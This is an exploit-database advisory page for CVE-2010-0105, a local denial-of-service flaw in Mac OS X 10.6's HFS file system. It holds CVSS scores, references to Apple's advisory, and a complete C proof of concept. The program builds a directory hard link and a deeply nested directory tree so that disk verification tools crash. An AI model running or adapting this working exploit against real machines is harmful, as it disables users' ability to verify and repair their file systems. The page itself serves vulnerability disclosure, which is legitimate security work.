MacOS X 10.6 hfs file system attack (Denial of Service) PoC

2010-04-22 / 2013-11-06
Risk: Medium
Local: Yes
Remote: No


CVSS Base Score: 4.9/10
Impact Subscore: 6.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

/* Proof of Concept for CVE-2010-0105 MacOS X 10.6 hfs file system attack (Denial of Service) by Maksymilian Arciemowicz from CXSecurity http://cxsecurity.com/issue/WLB-2005090063 NOTE: This DoS will be localized in phase Checking multi-linked directories So we need activate it with line connlink("C/C","CX"); Now we need create PATH_MAX/2 directory tree to make overflow. and we should get diskutil and fsck_hfs exit with sig=8 ~ x$ diskutil verifyVolume /Volumes/max2 Started filesystem verification on disk0s3 max2 Performing live verification Checking Journaled HFS Plus volume Checking extents overflow file Checking catalog file Checking multi-linked files Checking catalog hierarchy Checking extended attributes file Checking multi-linked directories Maximum nesting of folders and directory hard links reached The volume max2 could not be verified completely Error: -9957: Filesystem verify or repair failed Underlying error: 8: POSIX reports: Exec format error */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <sys/param.h> #include <sys/stat.h> #include <sys/types.h> int createdir(char *name){ if(0!=mkdir(name,((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0))| S_IWUSR |S_IXUSR)){ printf("Can`t create %s", name); exit(1);} else return 0; } int comein(char *name){ if(0!=chdir(name)){ printf("Can`t chdir in to %s", name); exit(1);} else return 0; } int connlink(a,b) char *a,*b; { if(0!=link(a,b)){ printf("Can`t create link %s => %s",a,b); exit(1);} else return 0; } int main(int argc,char *argv[]){ int level; FILE *fp; if(argc==2) { level=atoi(argv[1]); }else{ level=512; //default } createdir("C"); //create hardlink createdir("C/C"); //create hardlink connlink("C/C","CX"); //we need use to checking multi-linked directorie comein("C"); while(level--) printf("Level: %i mkdir:%i chdir:%i\n",level, createdir("C"), comein("C")); printf("check diskutil verifyVolume /\n"); return 0; }

References:

http://cxsecurity.com/issue/WLB-2010040284
http://support.apple.com/kb/HT4435


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top